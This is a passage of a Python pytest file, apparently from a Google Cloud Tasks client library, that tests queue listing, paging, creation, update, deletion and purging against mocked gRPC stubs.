cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_queues(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, queue.Queue) for i in results)
def test_list_queues_pages(transport_name: str = "grpc"):
client = CloudTasksClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_queues), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
pages = list(client.list_queues(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_queues_async_pager():
    client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_queues), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
async_pager = await client.list_queues(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, queue.Queue) for i in responses)
@pytest.mark.asyncio
async def test_list_queues_async_pages():
    client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_queues), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(), queue.Queue(), queue.Queue(),],
next_page_token="abc",
),
cloudtasks.ListQueuesResponse(queues=[], next_page_token="def",),
cloudtasks.ListQueuesResponse(
queues=[queue.Queue(),], next_page_token="ghi",
),
cloudtasks.ListQueuesResponse(queues=[queue.Queue(), queue.Queue(),],),
RuntimeError,
)
pages = []
async for page_ in (await client.list_queues(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
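# The pager tests above hand-build the same sequence of ListQueuesResponse pages
# each time. The helper below is an illustrative sketch of generating that
# side_effect sequence from (items, token) pairs; the name is hypothetical and
# the trailing RuntimeError is a guard the pager should never reach, because it
# stops once it sees a page with an empty next_page_token.
def _make_list_queues_pages_sketch(pages):
    responses = [
        cloudtasks.ListQueuesResponse(queues=queues, next_page_token=token)
        for queues, token in pages
    ]
    return tuple(responses) + (RuntimeError,)
# Example usage inside a pager test:
#     call.side_effect = _make_list_queues_pages_sketch(
#         [([queue.Queue(), queue.Queue()], "abc"), ([queue.Queue()], "")]
#     )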
@pytest.mark.parametrize("request_type", [cloudtasks.GetQueueRequest, dict,])
def test_get_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
def test_get_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
client.get_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetQueueRequest()
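# Each RPC gets its own *_empty_call coverage test with an identical body. The
# sketch below shows a parametrized variant over the two methods already tested
# above; it is illustrative only and not part of the generated file.
@pytest.mark.parametrize(
    "method_name,expected_request",
    [
        ("list_queues", cloudtasks.ListQueuesRequest()),
        ("get_queue", cloudtasks.GetQueueRequest()),
    ],
)
def test_empty_call_sketch(method_name, expected_request):
    client = CloudTasksClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )
    # Mock the matching transport stub, invoke the client method with no
    # arguments, and confirm an empty request of the right type was sent.
    with mock.patch.object(
        type(getattr(client.transport, method_name)), "__call__"
    ) as call:
        getattr(client, method_name)()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == expected_request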
@pytest.mark.asyncio
async def test_get_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.GetQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(name="name_value", state=queue.Queue.State.RUNNING,)
)
response = await client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_get_queue_async_from_dict():
await test_get_queue_async(request_type=dict)
def test_get_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
call.return_value = queue.Queue()
client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.get_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_queue(
cloudtasks.GetQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_queue(
cloudtasks.GetQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.CreateQueueRequest, dict,])
def test_create_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
def test_create_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
client.create_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateQueueRequest()
@pytest.mark.asyncio
async def test_create_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.CreateQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_queue.Queue(name="name_value", state=gct_queue.Queue.State.RUNNING,)
)
response = await client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_create_queue_async_from_dict():
await test_create_queue_async(request_type=dict)
def test_create_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateQueueRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
call.return_value = gct_queue.Queue()
client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateQueueRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
await client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_queue(
parent="parent_value", queue=gct_queue.Queue(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].queue
mock_val = gct_queue.Queue(name="name_value")
assert arg == mock_val
def test_create_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_queue(
cloudtasks.CreateQueueRequest(),
parent="parent_value",
queue=gct_queue.Queue(name="name_value"),
)
@pytest.mark.asyncio
async def test_create_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_queue(
parent="parent_value", queue=gct_queue.Queue(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].queue
mock_val = gct_queue.Queue(name="name_value")
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_queue(
cloudtasks.CreateQueueRequest(),
parent="parent_value",
queue=gct_queue.Queue(name="name_value"),
)
@pytest.mark.parametrize("request_type", [cloudtasks.UpdateQueueRequest, dict,])
def test_update_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.UpdateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
def test_update_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
client.update_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.UpdateQueueRequest()
@pytest.mark.asyncio
async def test_update_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.UpdateQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_queue.Queue(name="name_value", state=gct_queue.Queue.State.RUNNING,)
)
response = await client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.UpdateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_update_queue_async_from_dict():
await test_update_queue_async(request_type=dict)
def test_update_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.UpdateQueueRequest()
request.queue.name = "queue.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
call.return_value = gct_queue.Queue()
client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "queue.name=queue.name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.UpdateQueueRequest()
request.queue.name = "queue.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
await client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "queue.name=queue.name/value",) in kw["metadata"]
def test_update_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_queue(
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].queue
mock_val = gct_queue.Queue(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_queue(
cloudtasks.UpdateQueueRequest(),
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_queue(
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].queue
mock_val = gct_queue.Queue(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_queue(
cloudtasks.UpdateQueueRequest(),
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize("request_type", [cloudtasks.DeleteQueueRequest, dict,])
def test_delete_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteQueueRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
client.delete_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteQueueRequest()
@pytest.mark.asyncio
async def test_delete_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.DeleteQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteQueueRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_queue_async_from_dict():
await test_delete_queue_async(request_type=dict)
def test_delete_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
call.return_value = None
client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_queue(
cloudtasks.DeleteQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_queue(
cloudtasks.DeleteQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.PurgeQueueRequest, dict,])
def test_purge_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PurgeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
def test_purge_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
client.purge_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PurgeQueueRequest()
@pytest.mark.asyncio
async def test_purge_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.PurgeQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(name="name_value", state=queue.Queue.State.RUNNING,)
)
response = await client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PurgeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_purge_queue_async_from_dict():
await test_purge_queue_async(request_type=dict)
def test_purge_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PurgeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
